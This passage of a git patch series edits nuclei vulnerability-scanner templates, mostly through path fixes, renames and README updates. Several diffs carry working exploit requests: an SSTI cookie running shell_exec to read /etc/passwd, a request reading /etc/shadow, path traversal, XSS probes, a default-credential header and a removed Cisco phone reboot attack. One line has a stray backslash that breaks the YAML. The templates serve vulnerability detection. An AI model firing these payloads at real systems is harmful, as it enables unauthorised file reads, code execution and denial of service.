+++ b/takeovers/subdomain-takeover.yaml
@@ -15,7 +15,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers-condition: or
 
     matchers:
diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml
index d35a93e7a9..e784861b13 100644
--- a/technologies/basic-auth-detection.yaml
+++ b/technologies/basic-auth-detection.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     matchers-condition: and
     matchers:
diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml
index b9c1e8cc78..0a2a721928 100644
--- a/technologies/cacti-detect.yaml
+++ b/technologies/cacti-detect.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
       - "{{BaseURL}}/cacti/"
 
     matchers-condition: and
diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml
index 204b69786f..27f4814a5b 100644
--- a/technologies/google-storage.yaml
+++ b/technologies/google-storage.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers:
       - type: word
         words:
diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml
index abe3683d06..9b4a19b866 100644
--- a/technologies/home-assistant.yaml
+++ b/technologies/home-assistant.yaml
@@ -9,7 +9,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}:8123/"
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers:
       - type: word
         words:
diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml
index e851215f65..4807a5f322 100644
--- a/technologies/kong-detect.yaml
+++ b/technologies/kong-detect.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     matchers-condition: and
     matchers:
diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml
index 6852861ffe..5e445af239 100644
--- a/technologies/linkerd-badrule-detect.yaml
+++ b/technologies/linkerd-badrule-detect.yaml
@@ -14,7 +14,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     headers:
       l5d-dtab: /svc/*
 
diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml
index 39bff6298d..19a062f6fa 100644
--- a/technologies/mrtg-detect.yaml
+++ b/technologies/mrtg-detect.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
       - "{{BaseURL}}/mrtg/"
       - "{{BaseURL}}/MRTG/"
 
diff --git a/technologies/prometheus-exporter-detect.yaml b/technologies/prometheus-exporter-detect.yaml
index a2386b2067..62746091f9 100644
--- a/technologies/prometheus-exporter-detect.yaml
+++ b/technologies/prometheus-exporter-detect.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     headers:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     matchers-condition: and
diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml
index 6e7bd9c755..033288a3b9 100644
--- a/technologies/tech-detect.yaml
+++ b/technologies/tech-detect.yaml
@@ -6,7 +6,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     redirects: true
     max-redirects: 2
diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
index cc1d3a4837..5c218db625 100644
--- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
+++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
@@ -9,7 +9,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     headers:
       Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
     matchers-condition: and

From b528ce663c7c997aca9a08ddda164eb7cc73833d Mon Sep 17 00:00:00 2001
From: Michael Henriksen <mchnrksn@gmail.com>
Date: Wed, 13 Jan 2021 12:45:44 +0100
Subject: [PATCH 62/85] Introduce a new risky-cves root folder

The template for CVE-2020-16139 lived in `cves/`
and was not ignored by default in .nuclei-ignore
for a considurable time because of directory
restructuring. The risky-cves root folder is
introduced to make this mistake less likely to
happen in the future.
---
 .nuclei-ignore                                | 2 +-
 {cves => risky-cves}/2020/CVE-2020-16139.yaml | 0
 2 files changed, 1 insertion(+), 1 deletion(-)
 rename {cves => risky-cves}/2020/CVE-2020-16139.yaml (100%)

diff --git a/.nuclei-ignore b/.nuclei-ignore
index 2de13a9905..75fbf99c2f 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -15,7 +15,7 @@
 cves/CVE-2017-7529.yaml
 cves/CVE-2020-13379.yaml
 cves/CVE-2013-2251.yaml
-cves/CVE-2020-16139.yaml
+risky-cves/
 vulnerabilities/x-forwarded-host-injection.yaml
 
 # Fuzzing is excluded to avoid running bruteforce on every server as default.
diff --git a/cves/2020/CVE-2020-16139.yaml b/risky-cves/2020/CVE-2020-16139.yaml
similarity index 100%
rename from cves/2020/CVE-2020-16139.yaml
rename to risky-cves/2020/CVE-2020-16139.yaml

From 6ca9591c99f00aac7357047fcf585d983c7c345a Mon Sep 17 00:00:00 2001
From: Michael Henriksen <mchnrksn@gmail.com>
Date: Wed, 13 Jan 2021 12:49:03 +0100
Subject: [PATCH 63/85] Remove .nuclei-ignore references to non-existent
 templates

---
 .nuclei-ignore | 2 --
 1 file changed, 2 deletions(-)

diff --git a/.nuclei-ignore b/.nuclei-ignore
index 75fbf99c2f..f1949f8ba6 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -12,8 +12,6 @@
 # More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
 
 .pre-commit-config.yaml
-cves/CVE-2017-7529.yaml
-cves/CVE-2020-13379.yaml
 cves/CVE-2013-2251.yaml
 risky-cves/
 vulnerabilities/x-forwarded-host-injection.yaml

From 8352228bc68b4e99c94ca20839533a9e2339d6ab Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Wed, 13 Jan 2021 17:54:27 +0530
Subject: [PATCH 64/85] adding to avoid older structured folders.

---
 .nuclei-ignore | 22 ++++++++++++++++------
 1 file changed, 16 insertions(+), 6 deletions(-)

diff --git a/.nuclei-ignore b/.nuclei-ignore
index 2de13a9905..d7c47164c6 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -12,11 +12,10 @@
 # More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
 
 .pre-commit-config.yaml
-cves/CVE-2017-7529.yaml
-cves/CVE-2020-13379.yaml
-cves/CVE-2013-2251.yaml
-cves/CVE-2020-16139.yaml
-vulnerabilities/x-forwarded-host-injection.yaml
+cves/2013/CVE-2013-2251.yaml
+cves/2017/CVE-2017-7529.yaml	
+cves/2020/CVE-2020-13379.yaml	
+cves/2020/CVE-2020-16139.yaml
 
 # Fuzzing is excluded to avoid running bruteforce on every server as default.
 fuzzing/
@@ -26,4 +25,15 @@ helpers/
 miscellaneous/
 
 # Workflows are excluded from default run to avoid duplicate scans.
-workflows/
\ No newline at end of file
+workflows/
+
+# Adding older folder to avoid possilbe issue with nuclei ignore execution.
+misc/
+default-credentials/
+files/
+generic-detections/
+panels/
+payloads/
+security-misconfiguration/
+subdomain-takeover/
+tokens/
\ No newline at end of file

From b5b9eeb6bd778fce911004d93187c5c9153ceec0 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Wed, 13 Jan 2021 18:11:48 +0530
Subject: [PATCH 65/85] Removing CVE-2020-16139 temporarily

---
 .nuclei-ignore                      | 20 ++++++++++++++++----
 risky-cves/2020/CVE-2020-16139.yaml | 28 ----------------------------
 2 files changed, 16 insertions(+), 32 deletions(-)
 delete mode 100644 risky-cves/2020/CVE-2020-16139.yaml

diff --git a/.nuclei-ignore b/.nuclei-ignore
index f1949f8ba6..36a904978c 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -12,9 +12,10 @@
 # More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
 
 .pre-commit-config.yaml
-cves/CVE-2013-2251.yaml
-risky-cves/
-vulnerabilities/x-forwarded-host-injection.yaml
+cves/2013/CVE-2013-2251.yaml
+cves/2017/CVE-2017-7529.yaml	
+cves/2020/CVE-2020-13379.yaml	
+cves/2020/CVE-2020-16139.yaml
 
 # Fuzzing is excluded to avoid running bruteforce on every server as default.
 fuzzing/
@@ -24,4 +25,15 @@ helpers/
 miscellaneous/
 
 # Workflows are excluded from default run to avoid duplicate scans.
-workflows/
\ No newline at end of file
+workflows/
+
+# Adding older folder to avoid possilbe issue with nuclei ignore execution.
+misc/
+default-credentials/
+files/
+generic-detections/
+panels/
+payloads/
+security-misconfiguration/
+subdomain-takeover/
+tokens/
diff --git a/risky-cves/2020/CVE-2020-16139.yaml b/risky-cves/2020/CVE-2020-16139.yaml
deleted file mode 100644
index b8521bd8f1..0000000000
--- a/risky-cves/2020/CVE-2020-16139.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: CVE-2020-16139
-
-info:
-  name: Cisco 7937G Denial-of-Service Reboot Attack
-  author: pikpikcu
-  severity: low
-
-# Refrence:-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
-
-requests:
-  - raw:
-      - |
-        POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: header
-        words:
-          - "application/xml"
-      - type: word
-        words:
-          - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

From 3cb3ac6bcb18c0587803daffa8e77419276f1461 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Wed, 13 Jan 2021 18:13:00 +0530
Subject: [PATCH 66/85] Update .nuclei-ignore

---
 .nuclei-ignore | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.nuclei-ignore b/.nuclei-ignore
index 36a904978c..d7c47164c6 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -36,4 +36,4 @@ panels/
 payloads/
 security-misconfiguration/
 subdomain-takeover/
-tokens/
+tokens/
\ No newline at end of file

From 4fd46aabd3e4c897a0e7bd09ae9e044afbdff28d Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Wed, 13 Jan 2021 12:49:25 +0000
Subject: [PATCH 67/85] Auto Update README [Wed Jan 13 12:49:25 UTC 2021]
 :robot:

---
 README.md | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index 580eeeaad4..764f29b941 100644
--- a/README.md
+++ b/README.md
@@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves            | 155            | default-logins   | 8 |
+| cves            | 154            | default-logins   | 8 |
 | dns             | 6               | exposed-panels   | 72   |
 | exposed-tokens  | 9  | exposures        | 40      |
 | fuzzing         | 5           | helpers          | 3        |
@@ -164,7 +164,6 @@ An overview of the nuclei template directory including number of templates assoc
 │       ├── CVE-2020-15129.yaml
 │       ├── CVE-2020-15505.yaml
 │       ├── CVE-2020-15920.yaml
-│       ├── CVE-2020-16139.yaml
 │       ├── CVE-2020-16846.yaml
 │       ├── CVE-2020-16952.yaml
 │       ├── CVE-2020-17505.yaml
@@ -575,7 +574,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 </details>
 
-**53 directories, 475 files**.
+**53 directories, 474 files**.
 
 📖 Documentation
 -----

From 066e3813be19040d6faf01c3e67aa524051e6756 Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Wed, 13 Jan 2021 17:28:48 -0600
Subject: [PATCH 68/85] Update and rename public-tomcat-instance.yaml to
 public-tomcat-manager.yaml

Updating the name to better reflect what we're looking for.
Updating the status matcher since some Tomcat manager instances don't require auth.
---
 ...blic-tomcat-instance.yaml => public-tomcat-manager.yaml} | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)
 rename exposed-panels/{public-tomcat-instance.yaml => public-tomcat-manager.yaml} (77%)

diff --git a/exposed-panels/public-tomcat-instance.yaml b/exposed-panels/public-tomcat-manager.yaml
similarity index 77%
rename from exposed-panels/public-tomcat-instance.yaml
rename to exposed-panels/public-tomcat-manager.yaml
index e1c2ec79b6..3989655c1f 100644
--- a/exposed-panels/public-tomcat-instance.yaml
+++ b/exposed-panels/public-tomcat-manager.yaml
@@ -1,8 +1,8 @@
-id: public-tomcat-instance
+id: public-tomcat-manager
 
 info:
   name: tomcat manager disclosure
-  author: Ahmed Sherif
+  author: Ahmed Sherif & geeknik
   severity: info
 
 requests:
@@ -18,3 +18,5 @@ requests:
       - type: status
         status:
           - 401
+          - 200
+        condition: or

From e39a230a189938380119197f81eabbd79dec1ff1 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Thu, 14 Jan 2021 06:00:54 +0000
Subject: [PATCH 69/85] Auto Update README [Thu Jan 14 06:00:54 UTC 2021]
 :robot:

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 764f29b941..527b6c8331 100644
--- a/README.md
+++ b/README.md
@@ -277,7 +277,7 @@ An overview of the nuclei template directory including number of templates assoc
 │   ├── parallels-html-client.yaml
 │   ├── phpmyadmin-panel.yaml
 │   ├── polycom-admin-detect.yaml
-│   ├── public-tomcat-instance.yaml
+│   ├── public-tomcat-manager.yaml
 │   ├── pulse-secure-panel.yaml
 │   ├── rabbitmq-dashboard.yaml
 │   ├── rocketmq-console-exposure.yaml

From 9234a6801f6bd727faa61225fdc2eb58f6c48bf4 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Thu, 14 Jan 2021 12:27:13 +0530
Subject: [PATCH 70/85] moving files around

---
 {technologies => exposed-panels}/prometheus-exporter-detect.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename {technologies => exposed-panels}/prometheus-exporter-detect.yaml (100%)

diff --git a/technologies/prometheus-exporter-detect.yaml b/exposed-panels/prometheus-exporter-detect.yaml
similarity index 100%
rename from technologies/prometheus-exporter-detect.yaml
rename to exposed-panels/prometheus-exporter-detect.yaml

From 29c1b3422dbeab762f1419a3d8141969395e23a4 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Thu, 14 Jan 2021 06:57:45 +0000
Subject: [PATCH 71/85] Auto Update README [Thu Jan 14 06:57:45 UTC 2021]
 :robot:

---
 README.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index 527b6c8331..b5e88d0105 100644
--- a/README.md
+++ b/README.md
@@ -29,11 +29,11 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
 | cves            | 154            | default-logins   | 8 |
-| dns             | 6               | exposed-panels   | 72   |
+| dns             | 6               | exposed-panels   | 73   |
 | exposed-tokens  | 9  | exposures        | 40      |
 | fuzzing         | 5           | helpers          | 3        |
 | miscellaneous   | 14     | misconfiguration | 37 |
-| takeovers       | 1         | technologies     | 44     |
+| takeovers       | 1         | technologies     | 43     |
 | vulnerabilities | 62 | workflows        | 17        |
 
 
@@ -277,6 +277,7 @@ An overview of the nuclei template directory including number of templates assoc
 │   ├── parallels-html-client.yaml
 │   ├── phpmyadmin-panel.yaml
 │   ├── polycom-admin-detect.yaml
+│   ├── prometheus-exporter-detect.yaml
 │   ├── public-tomcat-manager.yaml
 │   ├── pulse-secure-panel.yaml
 │   ├── rabbitmq-dashboard.yaml
@@ -460,7 +461,6 @@ An overview of the nuclei template directory including number of templates assoc
 │   ├── nifi-detech.yaml
 │   ├── oidc-detect.yaml
 │   ├── pi-hole-detect.yaml
-│   ├── prometheus-exporter-detect.yaml
 │   ├── prometheus-exposed-panel.yaml
 │   ├── prtg-detect.yaml
 │   ├── redmine-cli-detect.yaml

From 631a135ea5fbae2f1d9edf1b098822b071b44c4d Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Thu, 14 Jan 2021 19:40:22 +0530
Subject: [PATCH 72/85] Delete basic-auth-workflow.yaml

---
 workflows/basic-auth-workflow.yaml | 16 ----------------
 1 file changed, 16 deletions(-)
 delete mode 100644 workflows/basic-auth-workflow.yaml

diff --git a/workflows/basic-auth-workflow.yaml b/workflows/basic-auth-workflow.yaml
deleted file mode 100644
index 3afd5b440b..0000000000
--- a/workflows/basic-auth-workflow.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: basic-auth-workflow
-
-info:
-  name: Basic auth Security Checks
-  author: w4cky_
-  description: A simple workflow that runs all Basic auth related nuclei templates on a given target.
-
-  # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
-  # Old workflows still remains valid, and will be working with all nuclei versions.
-
-workflows:
-
-  - template: technologies/basic-auth-detection.yaml
-
-    subtemplates:
-      - template: fuzzing/basic-auth-bruteforce.yaml
\ No newline at end of file

From f8114097a2706eb86b0ecb76c2e9d8c99bfbddbf Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Thu, 14 Jan 2021 14:11:28 +0000
Subject: [PATCH 73/85] Auto Update README [Thu Jan 14 14:11:28 UTC 2021]
 :robot:

---
 README.md | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index b5e88d0105..662023612c 100644
--- a/README.md
+++ b/README.md
@@ -34,7 +34,7 @@ An overview of the nuclei template directory including number of templates assoc
 | fuzzing         | 5           | helpers          | 3        |
 | miscellaneous   | 14     | misconfiguration | 37 |
 | takeovers       | 1         | technologies     | 43     |
-| vulnerabilities | 62 | workflows        | 17        |
+| vulnerabilities | 62 | workflows        | 16        |
 
 
 **Tree structure of nuclei templates:**
@@ -554,7 +554,6 @@ An overview of the nuclei template directory including number of templates assoc
 │       └── wordpress-wpcourses-info-disclosure.yaml
 └── workflows
     ├── artica-web-proxy-workflow.yaml
-    ├── basic-auth-workflow.yaml
     ├── bigip-workflow.yaml
     ├── cisco-asa-workflow.yaml
     ├── grafana-workflow.yaml
@@ -574,7 +573,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 </details>
 
-**53 directories, 474 files**.
+**53 directories, 473 files**.
 
 📖 Documentation
 -----

From dc2459593515aa2dbc71abce1dfc768b408a6abb Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Thu, 14 Jan 2021 20:11:56 +0530
Subject: [PATCH 74/85] BaseURL updates

---
 cves/2018/CVE-2018-1000129.yaml                             | 1 -
 cves/2019/CVE-2019-11580.yaml                               | 1 -
 cves/2019/CVE-2019-2588.yaml                                | 1 -
 cves/2019/CVE-2019-2725.yaml                                | 1 -
 cves/2019/CVE-2019-7609.yaml                                | 1 -
 cves/2020/CVE-2020-13942.yaml                               | 1 -
 cves/2020/CVE-2020-15129.yaml                               | 1 -
 cves/2020/CVE-2020-16846.yaml                               | 1 -
 cves/2020/CVE-2020-2551.yaml                                | 1 -
 cves/2020/CVE-2020-5410.yaml                                | 5 ++---
 cves/2020/CVE-2020-8512.yaml                                | 1 -
 cves/2020/CVE-2020-9484.yaml                                | 1 -
 default-logins/rabbitmq/rabbitmq-default-admin.yaml         | 1 -
 default-logins/solarwinds/solarwinds-default-admin.yaml     | 2 +-
 exposed-panels/activemq-panel.yaml                          | 3 ++-
 exposed-panels/airflow-exposure.yaml                        | 2 +-
 exposed-panels/ambari-exposure.yaml                         | 3 ++-
 exposed-panels/ansible-tower-exposure.yaml                  | 3 ++-
 exposed-panels/couchdb-fauxton.yaml                         | 3 ++-
 exposed-panels/druid-console-exposure.yaml                  | 3 ++-
 exposed-panels/flink-exposure.yaml                          | 3 ++-
 exposed-panels/kafka-connect-ui.yaml                        | 3 ++-
 exposed-panels/kafka-monitoring.yaml                        | 3 ++-
 exposed-panels/kafka-topics-ui.yaml                         | 3 ++-
 exposed-panels/public-tomcat-manager.yaml                   | 2 +-
 exposed-panels/rabbitmq-dashboard.yaml                      | 1 -
 exposed-panels/rocketmq-console-exposure.yaml               | 3 ++-
 exposed-panels/sap-hana-xsengine-panel.yaml                 | 1 -
 exposed-panels/traefik-dashboard.yaml                       | 1 -
 exposures/logs/struts-debug-mode.yaml                       | 3 ++-
 misconfiguration/aws-redirect.yaml                          | 3 ++-
 misconfiguration/django-debug-detect.yaml                   | 6 ------
 misconfiguration/elasticsearch.yaml                         | 2 --
 misconfiguration/exposed-kibana.yaml                        | 4 +---
 misconfiguration/kubernetes-pods.yaml                       | 1 -
 misconfiguration/manage-engine-ad-search.yaml               | 2 --
 misconfiguration/springboot-detect.yaml                     | 2 --
 misconfiguration/symfony-debugmode.yaml                     | 2 +-
 misconfiguration/unauthenticated-airflow.yaml               | 5 -----
 technologies/home-assistant.yaml                            | 1 -
 technologies/jolokia.yaml                                   | 1 -
 technologies/liferay-portal-detect.yaml                     | 2 --
 technologies/prometheus-exposed-panel.yaml                  | 1 -
 technologies/weblogic-detect.yaml                           | 1 -
 .../springboot/springboot-actuators-jolokia-xxe.yaml        | 1 -
 45 files changed, 31 insertions(+), 62 deletions(-)

diff --git a/cves/2018/CVE-2018-1000129.yaml b/cves/2018/CVE-2018-1000129.yaml
index 23c704d5d5..ed087afe5c 100644
--- a/cves/2018/CVE-2018-1000129.yaml
+++ b/cves/2018/CVE-2018-1000129.yaml
@@ -11,7 +11,6 @@ requests:
     path:
       - "{{BaseURL}}/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
       - "{{BaseURL}}/api/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
-      - "{{BaseURL}}:8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
     matchers-condition: and
     matchers:
       - type: status
diff --git a/cves/2019/CVE-2019-11580.yaml b/cves/2019/CVE-2019-11580.yaml
index eea2e6b10c..cbdd4f1b13 100644
--- a/cves/2019/CVE-2019-11580.yaml
+++ b/cves/2019/CVE-2019-11580.yaml
@@ -24,7 +24,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
-      - "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
     matchers-condition: and
     matchers:
       - type: word
diff --git a/cves/2019/CVE-2019-2588.yaml b/cves/2019/CVE-2019-2588.yaml
index 9fec707594..d598c438d3 100644
--- a/cves/2019/CVE-2019-2588.yaml
+++ b/cves/2019/CVE-2019-2588.yaml
@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
-      - "{{BaseURL}}:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
     matchers-condition: and
     matchers:
       - type: word
diff --git a/cves/2019/CVE-2019-2725.yaml b/cves/2019/CVE-2019-2725.yaml
index b983eb215a..41a96b44e5 100644
--- a/cves/2019/CVE-2019-2725.yaml
+++ b/cves/2019/CVE-2019-2725.yaml
@@ -18,7 +18,6 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/_async/AsyncResponseService"
-      - "{{BaseURL}}:7001/_async/AsyncResponseService"
     body: >-
       <?xml version="1.0" encoding="UTF-8" ?>
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml
index 1e1b51d234..826fd6235b 100644
--- a/cves/2019/CVE-2019-7609.yaml
+++ b/cves/2019/CVE-2019-7609.yaml
@@ -19,7 +19,6 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/api/timelion/run"
-      - "{{BaseURL}}:5601/api/timelion/run"
     headers:
       User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
       Content-Type: "application/json; charset=utf-8"
diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml
index 44ed589718..fb5a19afda 100644
--- a/cves/2020/CVE-2020-13942.yaml
+++ b/cves/2020/CVE-2020-13942.yaml
@@ -19,7 +19,6 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/context.json"
-      - "{{BaseURL}}:8181/context.json"
     headers:
       Content-Type: application/json
     body: |
diff --git a/cves/2020/CVE-2020-15129.yaml b/cves/2020/CVE-2020-15129.yaml
index 7bf33cb121..fbcbb54c0e 100644
--- a/cves/2020/CVE-2020-15129.yaml
+++ b/cves/2020/CVE-2020-15129.yaml
@@ -13,7 +13,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}"
-      - "{{BaseURL}}:8081"
     headers:
       X-Forwarded-Prefix: "https://foo.nl"
     matchers-condition: and
diff --git a/cves/2020/CVE-2020-16846.yaml b/cves/2020/CVE-2020-16846.yaml
index b8c4d22e05..cf0f90c272 100644
--- a/cves/2020/CVE-2020-16846.yaml
+++ b/cves/2020/CVE-2020-16846.yaml
@@ -18,7 +18,6 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/run"
-      - "{{BaseURL}}:8000/run"
     body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei"
     headers:
       Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header
diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml
index 8422bd7fc5..d0db87d470 100644
--- a/cves/2020/CVE-2020-2551.yaml
+++ b/cves/2020/CVE-2020-2551.yaml
@@ -24,7 +24,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/console/login/LoginForm.jsp"
-      - "{{BaseURL}}:7001/console/login/LoginForm.jsp"
     matchers-condition: and
     matchers:
       - type: word
diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml
index bca532c9bf..25452f8fcc 100644
--- a/cves/2020/CVE-2020-5410.yaml
+++ b/cves/2020/CVE-2020-5410.yaml
@@ -8,9 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
-      - "{{BaseURL}}:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
-    matchers-condition: and
+      - "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
+\    matchers-condition: and
     matchers:
       - type: status
         status:
diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml
index b5416bc04a..85741af04a 100644
--- a/cves/2020/CVE-2020-8512.yaml
+++ b/cves/2020/CVE-2020-8512.yaml
@@ -13,7 +13,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
-      - '{{BaseURL}}:32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
     matchers-condition: and
     matchers:
       - type: word
diff --git a/cves/2020/CVE-2020-9484.yaml b/cves/2020/CVE-2020-9484.yaml
index d9faeed998..c24ee4178b 100644
--- a/cves/2020/CVE-2020-9484.yaml
+++ b/cves/2020/CVE-2020-9484.yaml
@@ -12,7 +12,6 @@ requests:
       Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy"
     path:
       - "{{BaseURL}}/index.jsp"
-      - "{{BaseURL}}:8080/index.jsp"
     matchers-condition: and
     matchers:
       - type: status
diff --git a/default-logins/rabbitmq/rabbitmq-default-admin.yaml b/default-logins/rabbitmq/rabbitmq-default-admin.yaml
index 98ed1b2c56..5ea14200a0 100644
--- a/default-logins/rabbitmq/rabbitmq-default-admin.yaml
+++ b/default-logins/rabbitmq/rabbitmq-default-admin.yaml
@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/api/whoami"
-      - "{{BaseURL}}:15672/api/whoami"
     headers:
       Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q="
     matchers-condition: and
